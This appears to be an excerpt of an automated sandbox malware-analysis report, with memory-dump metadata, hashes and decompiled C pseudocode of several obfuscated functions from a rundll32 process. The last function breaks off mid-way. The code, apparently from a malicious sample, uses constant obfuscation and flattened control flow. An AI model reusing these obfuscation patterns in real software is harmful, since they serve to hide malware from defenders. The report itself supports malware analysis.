                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EkAz$f</
                                                                                                                      • API String ID: 0-1101062405
                                                                                                                      • Opcode ID: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction ID: 6105c40eceee27cb0e2b193849d71cc70378b4a88d21a3d500570b0438e35f46
                                                                                                                      • Opcode Fuzzy Hash: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction Fuzzy Hash: 1C8132710083419FC769DF25C98A42BFBF1FBD8748F544A2DF29A86260D7B19A49CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0018C9A9(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t147;
                                                                                                                      				void* _t168;
                                                                                                                      				void* _t171;
                                                                                                                      				signed int _t188;
                                                                                                                      				signed int _t189;
                                                                                                                      				signed int _t190;
                                                                                                                      				void* _t192;
                                                                                                                      				signed int* _t195;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0017CF25(_t147);
                                                                                                                      				_v60 = 0x2183dd;
                                                                                                                      				_t195 =  &(( &_v64)[6]);
                                                                                                                      				_v60 = _v60 << 0xc;
                                                                                                                      				_v60 = _v60 << 0xf;
                                                                                                                      				_t192 = 0;
                                                                                                                      				_t171 = 0xa488efe;
                                                                                                                      				_t188 = 0x78;
                                                                                                                      				_v60 = _v60 * 0xa;
                                                                                                                      				_v60 = _v60 ^ 0x10000001;
                                                                                                                      				_v44 = 0xe22f1a;
                                                                                                                      				_v44 = _v44 + 0xffffab53;
                                                                                                                      				_v44 = _v44 / _t188;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 ^ 0x00003c3b;
                                                                                                                      				_v36 = 0x9a4ce6;
                                                                                                                      				_v36 = _v36 + 0xffffe16e;
                                                                                                                      				_v36 = _v36 | 0x72a3b0b5;
                                                                                                                      				_v36 = _v36 ^ 0x32bbbef5;
                                                                                                                      				_v28 = 0xd892e4;
                                                                                                                      				_v28 = _v28 | 0x189bde37;
                                                                                                                      				_v28 = _v28 ^ 0x998d043c;
                                                                                                                      				_v28 = _v28 ^ 0xc156dacb;
                                                                                                                      				_v20 = 0xff0234;
                                                                                                                      				_v20 = _v20 + 0xffffad5b;
                                                                                                                      				_v20 = _v20 ^ 0x00f1fad0;
                                                                                                                      				_v40 = 0xdc05b;
                                                                                                                      				_v40 = _v40 ^ 0xb55e20f9;
                                                                                                                      				_t189 = 3;
                                                                                                                      				_v40 = _v40 / _t189;
                                                                                                                      				_v40 = _v40 ^ 0x3c7a3b1c;
                                                                                                                      				_v64 = 0x518ad0;
                                                                                                                      				_v64 = _v64 ^ 0x6bfb13ad;
                                                                                                                      				_v64 = _v64 << 2;
                                                                                                                      				_t190 = 0x6a;
                                                                                                                      				_v64 = _v64 * 7;
                                                                                                                      				_v64 = _v64 ^ 0xc6a3f60b;
                                                                                                                      				_v24 = 0x25f852;
                                                                                                                      				_v24 = _v24 + 0xffff91c6;
                                                                                                                      				_v24 = _v24 ^ 0x002d038f;
                                                                                                                      				_v32 = 0x681d6c;
                                                                                                                      				_v32 = _v32 ^ 0x9f49642f;
                                                                                                                      				_v32 = _v32 * 0x3a;
                                                                                                                      				_v32 = _v32 ^ 0x0d93f477;
                                                                                                                      				_v56 = 0xa4373;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 << 0xb;
                                                                                                                      				_v56 = _v56 << 9;
                                                                                                                      				_v56 = _v56 ^ 0x521bad52;
                                                                                                                      				_v16 = 0x3abafe;
                                                                                                                      				_v16 = _v16 | 0x2531d7a0;
                                                                                                                      				_v16 = _v16 ^ 0x25301684;
                                                                                                                      				_v48 = 0x8b99e8;
                                                                                                                      				_v48 = _v48 ^ 0x8a9a3b2d;
                                                                                                                      				_v48 = _v48 * 0x56;
                                                                                                                      				_v48 = _v48 / _t190;
                                                                                                                      				_v48 = _v48 ^ 0x00e0af40;
                                                                                                                      				_v8 = 0xf2305e;
                                                                                                                      				_v8 = _v8 | 0x3a3bb36f;
                                                                                                                      				_v8 = _v8 ^ 0x3af325a3;
                                                                                                                      				_v52 = 0xa4558c;
                                                                                                                      				_v52 = _v52 >> 0xe;
                                                                                                                      				_v52 = _v52 << 0xd;
                                                                                                                      				_v52 = _v52 + 0xad08;
                                                                                                                      				_v52 = _v52 ^ 0x0057bd84;
                                                                                                                      				_v12 = 0xb8a572;
                                                                                                                      				_v12 = _v12 | 0x00b7603c;
                                                                                                                      				_v12 = _v12 ^ 0x00ba29b3;
                                                                                                                      				while(_t171 != 0x263a30c) {
                                                                                                                      					if(_t171 == 0x50e379a) {
                                                                                                                      						_push(_t171);
                                                                                                                      						_push(_t171);
                                                                                                                      						_t192 = E00183512(_v4 + _v4);
                                                                                                                      						if(_t192 != 0) {
                                                                                                                      							_t171 = 0x263a30c;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						if(_t171 == 0xa488efe) {
                                                                                                                      							_t171 = 0xdc1694f;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t171 != 0xdc1694f) {
                                                                                                                      								L11:
                                                                                                                      								if(_t171 != 0xa17b831) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t168 = E0018D2A8(0, _v36 | _v60, _v20, _a16, _v40, _v64, _a8, _v24,  &_v4);
                                                                                                                      								_t195 =  &(_t195[7]);
                                                                                                                      								if(_t168 != 0) {
                                                                                                                      									_t171 = 0x50e379a;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t192;
                                                                                                                      				}
                                                                                                                      				E0018D2A8(_t192, _v28 | _v44, _v48, _a16, _v8, _v52, _a8, _v12,  &_v4);
                                                                                                                      				_t195 =  &(_t195[7]);
                                                                                                                      				_t171 = 0xa17b831;
                                                                                                                      				goto L11;
                                                                                                                      			}





























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;<$sC
                                                                                                                      • API String ID: 0-4190640370
                                                                                                                      • Opcode ID: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction ID: 2d46cc5f82c597c328e176ddb40994175f64ef88a19731e017178104de1d7fab
                                                                                                                      • Opcode Fuzzy Hash: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction Fuzzy Hash: BA7112721083819FC758DF25C48A81FBBF2FBD4798F544A1DF59696220C372DA498F86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0017777B(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				unsigned int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t149;
                                                                                                                      				signed int _t152;
                                                                                                                      				signed int _t153;
                                                                                                                      				signed int _t154;
                                                                                                                      				signed int _t155;
                                                                                                                      				void* _t158;
                                                                                                                      				signed int* _t179;
                                                                                                                      				void* _t181;
                                                                                                                      				void* _t182;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t178 = _a4;
                                                                                                                      				_t179 = __edx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t128);
                                                                                                                      				_v104 = 0x8623b;
                                                                                                                      				_t182 = _t181 + 0x18;
                                                                                                                      				_v104 = _v104 + 0xffff31eb;
                                                                                                                      				_v104 = _v104 | 0x66daf122;
                                                                                                                      				_t158 = 0xd040992;
                                                                                                                      				_t152 = 0x22;
                                                                                                                      				_v104 = _v104 / _t152;
                                                                                                                      				_v104 = _v104 ^ 0x03069644;
                                                                                                                      				_v100 = 0x2bbbe;
                                                                                                                      				_t153 = 0x14;
                                                                                                                      				_v100 = _v100 * 0xf;
                                                                                                                      				_v100 = _v100 / _t153;
                                                                                                                      				_v100 = _v100 | 0x351d3417;
                                                                                                                      				_v100 = _v100 ^ 0x351dc123;
                                                                                                                      				_v72 = 0xab81ef;
                                                                                                                      				_v72 = _v72 >> 0xd;
                                                                                                                      				_v72 = _v72 ^ 0x000a49b6;
                                                                                                                      				_v76 = 0x16a933;
                                                                                                                      				_v76 = _v76 ^ 0xe7c1b086;
                                                                                                                      				_v76 = _v76 ^ 0xe7d23b20;
                                                                                                                      				_v60 = 0x52cbe;
                                                                                                                      				_t154 = 0x2d;
                                                                                                                      				_v60 = _v60 * 0x6f;
                                                                                                                      				_v60 = _v60 ^ 0x023eaa51;
                                                                                                                      				_v84 = 0x759948;
                                                                                                                      				_v84 = _v84 + 0x9b78;
                                                                                                                      				_v84 = _v84 ^ 0xc5583688;
                                                                                                                      				_v84 = _v84 ^ 0xc523a4cd;
                                                                                                                      				_v88 = 0xf8b174;
                                                                                                                      				_v88 = _v88 << 0xa;
                                                                                                                      				_v88 = _v88 | 0xb04365c9;
                                                                                                                      				_v88 = _v88 ^ 0xf2c73fc1;
                                                                                                                      				_v64 = 0x1cff55;
                                                                                                                      				_v64 = _v64 / _t154;
                                                                                                                      				_v64 = _v64 ^ 0x000b3edd;
                                                                                                                      				_v68 = 0x9a9e72;
                                                                                                                      				_v68 = _v68 + 0xffffcb3f;
                                                                                                                      				_v68 = _v68 ^ 0x009b4266;
                                                                                                                      				_v92 = 0x7b2ebb;
                                                                                                                      				_v92 = _v92 << 0xb;
                                                                                                                      				_v92 = _v92 ^ 0xf233ff82;
                                                                                                                      				_v92 = _v92 ^ 0x2b4dc82a;
                                                                                                                      				_v96 = 0x6d21c4;
                                                                                                                      				_v96 = _v96 ^ 0x8acf53c4;
                                                                                                                      				_v96 = _v96 + 0xffff3a52;
                                                                                                                      				_v96 = _v96 | 0xe5741bb4;
                                                                                                                      				_v96 = _v96 ^ 0xeff12f72;
                                                                                                                      				_v56 = 0x5c5116;
                                                                                                                      				_v56 = _v56 + 0xffff598a;
                                                                                                                      				_v56 = _v56 ^ 0x00573a27;
                                                                                                                      				_v80 = 0xae67f2;
                                                                                                                      				_v80 = _v80 + 0x56e4;
                                                                                                                      				_t155 = 0x50;
                                                                                                                      				_v80 = _v80 / _t155;
                                                                                                                      				_v80 = _v80 ^ 0x0002e359;
                                                                                                                      				do {
                                                                                                                      					while(_t158 != 0x253e674) {
                                                                                                                      						if(_t158 == 0x4f8855c) {
                                                                                                                      							E0018F88F(_t178 + 4,  &_v52, __eflags, _v96, _v56, _v80);
                                                                                                                      						} else {
                                                                                                                      							if(_t158 == 0x5caea7a) {
                                                                                                                      								E00184D91( *_t178,  &_v52, _v68, _v92);
                                                                                                                      								_t182 = _t182 + 8;
                                                                                                                      								_t158 = 0x4f8855c;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t158 == 0x9ad54af) {
                                                                                                                      									_push(_t158);
                                                                                                                      									_push(_t158);
                                                                                                                      									_t149 = E00183512(_t179[1]);
                                                                                                                      									 *_t179 = _t149;
                                                                                                                      									__eflags = _t149;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t158 = 0x253e674;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t158 == 0xa436207) {
                                                                                                                      										_t179[1] = E0018109E(_t178);
                                                                                                                      										_t158 = 0x9ad54af;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t158 != 0xd040992) {
                                                                                                                      											goto L13;
                                                                                                                      										} else {
                                                                                                                      											_t158 = 0xa436207;
                                                                                                                      											 *_t179 =  *_t179 & 0x00000000;
                                                                                                                      											_t179[1] = _v104;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L16:
                                                                                                                      						__eflags =  *_t179;
                                                                                                                      						_t127 =  *_t179 != 0;
                                                                                                                      						__eflags = _t127;
                                                                                                                      						return 0 | _t127;
                                                                                                                      					}
                                                                                                                      					E001864C5(_v60, _v84, _v88, _v64, _t179,  &_v52);
                                                                                                                      					_t182 = _t182 + 0x10;
                                                                                                                      					_t158 = 0x5caea7a;
                                                                                                                      					L13:
                                                                                                                      					__eflags = _t158 - 0x12a0183;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L16;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ':W$V
                                                                                                                      • API String ID: 0-741684166
                                                                                                                      • Opcode ID: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction ID: cc86a366674e86b7cd53822bbf57393065a3c4cb49c4750b31573c6c90ecae71
                                                                                                                      • Opcode Fuzzy Hash: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction Fuzzy Hash: 7B615475109342AFC768DF21C88991FBBF1FBD8318F50991CF2DA96260D3758A098F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0018EBFF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				void* _t91;
                                                                                                                      				signed int _t109;
                                                                                                                      				signed int _t110;
                                                                                                                      				signed int _t111;
                                                                                                                      				void* _t114;
                                                                                                                      				void* _t116;
                                                                                                                      				void* _t131;
                                                                                                                      				void* _t132;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t131 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t91);
                                                                                                                      				_v28 = 0x7108be;
                                                                                                                      				_v28 = _v28 + 0x734d;
                                                                                                                      				_v28 = _v28 + 0xa8e4;
                                                                                                                      				_t132 = 0;
                                                                                                                      				_v28 = _v28 + 0xffff8493;
                                                                                                                      				_t114 = 0xcca5bf9;
                                                                                                                      				_v28 = _v28 ^ 0x0074778b;
                                                                                                                      				_v20 = 0xc2a60c;
                                                                                                                      				_v20 = _v20 >> 5;
                                                                                                                      				_v20 = _v20 ^ 0x558996ec;
                                                                                                                      				_v20 = _v20 ^ 0x55851de9;
                                                                                                                      				_v12 = 0x41ee29;
                                                                                                                      				_t21 =  &_v12; // 0x41ee29
                                                                                                                      				_t109 = 0x29;
                                                                                                                      				_v12 =  *_t21 * 0x26;
                                                                                                                      				_v12 = _v12 ^ 0x09c82f39;
                                                                                                                      				_v32 = 0x1f5650;
                                                                                                                      				_v32 = _v32 >> 1;
                                                                                                                      				_v32 = _v32 / _t109;
                                                                                                                      				_v32 = _v32 ^ 0xe76a4887;
                                                                                                                      				_v32 = _v32 ^ 0xe76186a0;
                                                                                                                      				_v36 = 0x15f4a6;
                                                                                                                      				_v36 = _v36 | 0x84842460;
                                                                                                                      				_v36 = _v36 + 0x9b66;
                                                                                                                      				_t110 = 0x43;
                                                                                                                      				_v36 = _v36 / _t110;
                                                                                                                      				_v36 = _v36 ^ 0x01f36aaa;
                                                                                                                      				_v4 = 0xe58fa8;
                                                                                                                      				_v4 = _v4 >> 0xf;
                                                                                                                      				_v4 = _v4 ^ 0x0008ca28;
                                                                                                                      				_v8 = 0x294ac3;
                                                                                                                      				_v8 = _v8 + 0xffff78db;
                                                                                                                      				_v8 = _v8 ^ 0x0024bdda;
                                                                                                                      				_v16 = 0xcf6d8f;
                                                                                                                      				_v16 = _v16 >> 5;
                                                                                                                      				_v16 = _v16 + 0x1116;
                                                                                                                      				_v16 = _v16 ^ 0x000942b4;
                                                                                                                      				_v24 = 0xd07c42;
                                                                                                                      				_v24 = _v24 | 0x50b68ca9;
                                                                                                                      				_t111 = 0x74;
                                                                                                                      				_v24 = _v24 / _t111;
                                                                                                                      				_v24 = _v24 << 3;
                                                                                                                      				_v24 = _v24 ^ 0x05925fb7;
                                                                                                                      				while(_t114 != 0x2cca53b) {
                                                                                                                      					if(_t114 == 0x3850c59) {
                                                                                                                      						E001768DE(_v4, _v8, _v16, _v24,  *0x195214);
                                                                                                                      					} else {
                                                                                                                      						if(_t114 == 0xcca5bf9) {
                                                                                                                      							_push(_t114);
                                                                                                                      							_push(_t114);
                                                                                                                      							_t116 = 0x50;
                                                                                                                      							 *0x195214 = E00183512(_t116);
                                                                                                                      							_t114 = 0xd9a7a55;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t114 == 0xd96b1a6) {
                                                                                                                      								_t132 = E0018EE11(_t131, _v32, _v36, _a8);
                                                                                                                      								if(_t132 == 0) {
                                                                                                                      									_t114 = 0x2cca53b;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t114 != 0xd9a7a55) {
                                                                                                                      									L12:
                                                                                                                      									if(_t114 != 0xca68b5e) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(E00190D5B() != 0) {
                                                                                                                      										_t114 = 0xd96b1a6;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t132;
                                                                                                                      				}
                                                                                                                      				E00176D80();
                                                                                                                      				_t114 = 0x3850c59;
                                                                                                                      				goto L12;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )A$Ms
                                                                                                                      • API String ID: 0-3843022149
                                                                                                                      • Opcode ID: a54aefe30b8b4e0f59769399081bd7d442c2678bd3257d1100b2f14490b65794
                                                                                                                      • Instruction ID: 674fc5c9a072fba81fa24a4bef04255ecd7eb58b70de32cc5c309f830b15feee
                                                                                                                      • Opcode Fuzzy Hash: a54aefe30b8b4e0f59769399081bd7d442c2678bd3257d1100b2f14490b65794
                                                                                                                      • Instruction Fuzzy Hash: 565156716093019FC748DF65D88A81BBBF2FBD8758F008A1DF58556260D372DA4A8F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00191993(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				char _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				void* _t120;
                                                                                                                      				signed int _t126;
                                                                                                                      				signed int _t127;
                                                                                                                      				intOrPtr _t138;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_v52 = 0x104;
                                                                                                                      				_push(0x104);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(0x104);
                                                                                                                      				_v68 = 0x5658b2;
                                                                                                                      				_t138 = 0;
                                                                                                                      				_v64 = 0x871b59;
                                                                                                                      				_v60 = 0xa8976a;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_v40 = 0xee5304;
                                                                                                                      				_v40 = _v40 >> 0xa;
                                                                                                                      				_v40 = _v40 ^ 0x00002b94;
                                                                                                                      				_v24 = 0xe2229b;
                                                                                                                      				_v24 = _v24 >> 2;
                                                                                                                      				_v24 = _v24 << 0xa;
                                                                                                                      				_v24 = _v24 ^ 0xe22b2fd9;
                                                                                                                      				_v8 = 0x13a34a;
                                                                                                                      				_t126 = 0x7b;
                                                                                                                      				_v8 = _v8 * 0x58;
                                                                                                                      				_v8 = _v8 * 0x7c;
                                                                                                                      				_v8 = _v8 >> 6;
                                                                                                                      				_v8 = _v8 ^ 0x01172ec8;
                                                                                                                      				_v16 = 0x4f354;
                                                                                                                      				_t127 = 0x1c;
                                                                                                                      				_v16 = _v16 / _t126;
                                                                                                                      				_v16 = _v16 | 0x38cda962;
                                                                                                                      				_v16 = _v16 << 7;
                                                                                                                      				_v16 = _v16 ^ 0x66d4d439;
                                                                                                                      				_v12 = 0x949837;
                                                                                                                      				_v12 = _v12 ^ 0x28b93813;
                                                                                                                      				_v12 = _v12 + 0xffff414d;
                                                                                                                      				_v12 = _v12 + 0xcc4e;
                                                                                                                      				_v12 = _v12 ^ 0x282f8cad;
                                                                                                                      				_v44 = 0x4b103d;
                                                                                                                      				_v44 = _v44 + 0xffffdccd;
                                                                                                                      				_v44 = _v44 ^ 0x0043fba2;
                                                                                                                      				_v28 = 0xbeb96;
                                                                                                                      				_v28 = _v28 + 0xffffd9aa;
                                                                                                                      				_v28 = _v28 >> 0xd;
                                                                                                                      				_v28 = _v28 ^ 0x000a38bb;
                                                                                                                      				_v48 = 0xb1bdc9;
                                                                                                                      				_v48 = _v48 + 0x24fd;
                                                                                                                      				_v48 = _v48 ^ 0x00b0c363;
                                                                                                                      				_v36 = 0x53e429;
                                                                                                                      				_v36 = _v36 + 0xffff530c;
                                                                                                                      				_v36 = _v36 / _t127;
                                                                                                                      				_v36 = _v36 ^ 0x0005d2bf;
                                                                                                                      				_v20 = 0xb0734b;
                                                                                                                      				_v20 = _v20 | 0x98e9e8ae;
                                                                                                                      				_v20 = _v20 + 0x857e;
                                                                                                                      				_v20 = _v20 << 3;
                                                                                                                      				_v20 = _v20 ^ 0xc7d86034;
                                                                                                                      				_v32 = 0x655a5c;
                                                                                                                      				_v32 = _v32 >> 8;
                                                                                                                      				_v32 = _v32 | 0x0e60c7ff;
                                                                                                                      				_v32 = _v32 ^ 0x0e677ecd;
                                                                                                                      				_t120 = E00183C1B(_t127, _a16, _v40);
                                                                                                                      				_t137 = _t120;
                                                                                                                      				if(_t120 != 0) {
                                                                                                                      					_t138 = E00181785(_a4, _v16, _v12, _t127, _v44, _t137, _v28,  &_v52);
                                                                                                                      					E00184DAD(_v48, _v36, _t137, _v20, _v32);
                                                                                                                      				}
                                                                                                                      				return _t138;
                                                                                                                      			}
























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )S$\Ze
                                                                                                                      • API String ID: 0-2852868822
                                                                                                                      • Opcode ID: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction ID: d91376361eb94388fab9d87a01a817c9ee5fb9a64f189ef8c01f328a85dc6d68
                                                                                                                      • Opcode Fuzzy Hash: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction Fuzzy Hash: 135102B2C00209EBCF49DFE5D98A8DEFBB5FB48704F208159E511B6250D3B54A55CFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0017BB4B(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				signed int* _t50;
                                                                                                                      				signed int _t52;
                                                                                                                      				unsigned int* _t65;
                                                                                                                      				signed int _t66;
                                                                                                                      				signed int _t68;
                                                                                                                      				signed int _t75;
                                                                                                                      				unsigned int _t76;
                                                                                                                      				unsigned int _t77;
                                                                                                                      				unsigned int* _t80;
                                                                                                                      				signed int* _t81;
                                                                                                                      				signed int* _t82;
                                                                                                                      				unsigned int _t84;
                                                                                                                      				void* _t90;
                                                                                                                      				void* _t92;
                                                                                                                      				void* _t94;
                                                                                                                      				void* _t95;
                                                                                                                      
                                                                                                                      				_push( *((intOrPtr*)(_t94 + 0x18)));
                                                                                                                      				_push( *(_t94 + 0x24));
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t50 = E0017CF25( *((intOrPtr*)(_t94 + 0x18)));
                                                                                                                      				 *(_t94 + 0x20) = 0xfe2925;
                                                                                                                      				_t4 =  &(_t50[1]); // 0x4
                                                                                                                      				_t81 = _t4;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x7128;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0x09a7dad2;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0xffff7390;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09fc0087;
                                                                                                                      				 *(_t94 + 0x1c) = 0x6df10d;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) << 0xa;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0xffff9bae;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0x6e9b;
                                                                                                                      				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) ^ 0xb7c65291;
                                                                                                                      				 *(_t94 + 0x34) = 0x26c28e;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x9999;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x5997;
